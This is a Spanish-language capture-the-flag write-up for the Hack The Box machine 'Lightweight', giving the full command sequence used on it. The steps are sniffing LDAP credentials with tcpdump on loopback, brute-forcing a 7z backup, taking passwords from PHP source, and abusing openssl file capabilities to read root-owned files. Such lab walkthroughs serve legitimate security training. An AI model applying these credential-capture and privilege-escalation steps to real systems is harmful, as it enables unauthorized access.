, , ,

-HACK THE BOX- WRITEUP HTB LIGHTWEIGHT SPANISH

-HACK THE BOX- WRITEUP HTB LIGHTWEIGHT SPANISH

Han retirado LW y este es un writeup para tan buena caja

https://www.hackthebox.eu/home/machines/profile/166

NMAP

Comenzamos escaneando con nmap

nmap -sC -sV -O -o lightweightHTB 10.10.10.119

En la URL: 10.10.10.119 podemos visualizar lo siguiente

Pinchamos user y encontramos la siguiente instrucción…

Su cuenta

Si no leyó la página de información, vaya allí y léala detenidamente.

Este servidor te permite entrar con ssh. Su IP (10.10.15.6) se agrega automáticamente como ID de usuario y contraseña dentro de un minuto de su primera solicitud de página http. Le recomendamos que cambie su contraseña tan pronto como ingrese en el cuadro.

Si necesita restablecer su cuenta por cualquier motivo, haga clic aquí y espere (hasta) un minuto. Su cuenta será eliminada y agregada nuevamente. Cualquier archivo en su directorio de inicio será eliminado también.

Realizamos el comando  ifconfig para conocer nuestra IP 10.10.x.x

Ingresamos por SSH con el siguiente comando

ssh [email protected]

Password: 10.10.x.x (tu misma ip)

Una vez adentro debemos cambiar la contraseña (instrucción dada en la página anterior) con el comando

passwd

Podemos visualizar algunos usuarios free en el sistema y dos usuarios interesantes ldapuser1 y ldapuser2

Usaremos TCPDUMP para sniffear el trafico de la maquina con nuestro usuario 10.10.15.6 (tu ip)

Para conocer la lista de interfaces que reconoce la maquina

tcpdump -D

Observamos que existe la interfaz lo (Loopback) a partir de esta sniffearemos la máquina en el puerto 389 (ldap) encontrado en nmap,  con el siguiente comando:

tcpdump -i lo -w cap.pcap -v port 389

Donde:

-i = interface

-w = Guarda el resultado en un archivo en este caso cap.pcap

-v = salida modo verbose, esto quiere decir que la salida se mostrar de forma mas detallada.

Port = 389 el puerto con el servicio ldap

Abrimos el archivo resultante y nos encontramos con lo que podría ser el usuario y la contraseña del ldapuser2, usar el comando Strings para visualizar solo los string del archivo:

strings cap.pcap

User: ldapuser2

Password: 8bc8251332abe1d7f105d3e53ad39ac2

(en la imagen aparece una D al final eso es parte de la siguiente palabra D]\F2, no considerar) comando:

su ldapuser2

password:8bc8251332abe1d7f105d3e53ad39ac2

Ingresamos al directorio de ldapuser2 y encontramos el primer Flag de USER en user.txt

cat user.txt

FLAG USER: 8a86XXXXXXXXXXXXX7f48026

Continueando con la búsqueda de root, encontramos un archivo que puede ser interesante llamado “backup.7z”.

En este directorio “ldapuser2” no podemos descargar el archivo por falta de permisos.

Al navegar por los directorios nos encontramos en la raíz, un par de carpetas que nos permiten escribir y leer (permisos 777) copiaremos el archivo “backup.7z” al directorio tmp

cp backup.7z /tmp/backup.7z

Ahora descargamos el archivo a nuestra máquina local (aquí perdí harto tiempo porque trataba de descargar el archivo con el usuario ldapuser2, el cual no tenía permisos en cambio el usuario IP que genera la máquina si los tenia :P)

scp [email protected]:/tmp/backup.7z /root/Descargas/backup.7z

Una vez descargado el archivo procedemos a crakearlo para revelar su contenido para esto ocuparemos la siguiente herramienta (ocuparemos el diccionario que viene en el programa).

https://github.com/thelinuxchoice/brutezip

Encontramos la password: delete

Descomprimimos con: 7z e backup.7z

Encontramos los siguientes archivos que parecen ser del sitio web

En el archivo “status.php” encontramos en su código fuente lo que parece ser el usuario y la contraseña de ldapuser1.

$username = 'ldapuser1';

$password = 'f3ca9d298a553da117442deeb6fa932d';

Ahora somos ldapuser1

En el foro de HTB hablaban mucho de capabilities, pues entonces despues de estudiar que eran, vemos las capabilities que posee openssl (el cual ocuparemos para copiar el archivo root/root.txt)

getcap openssl

(+ep) means that the capability is permitted and effective.

Podemos ver que openssl tiene la capacidad de acceder como root a partir de esto lo ocuparemos para obtener el tan ansiado root.txt guardandolo como file.txt

./openssl enc -in /root/root.txt -out file.txt

Flag root: f1d4XXXXXXXXXXXXXXf4b2135fa

Con eso ya tenemos root de la box.

TEAM  HTB{SombreroBlanco}

LINKS DE INTERÉS

The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.

https://gtfobins.github.io/

LINUX POSIX CAPABILITIES

http://www.securitybydefault.com/2008/09/linux-posix-capabilities.html

7z crack

https://gist.github.com/bcoles/421cc413d07cd9ba7855


Recuerde que si quieren estar informados de las últimas novedades o noticias de ciberseguridad, hacking y otros, puedes unirte a nuestro canal de telegram o seguir nuestras redes sociales:

Telegram: https://t.me/sombreroblanco

Twitter: https://twitter.com/SombreroBlanc0

Facebook: https://www.facebook.com/BlancoSombrero

Instagram: https://www.instagram.com/sombreroblanc0/

Leave a reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *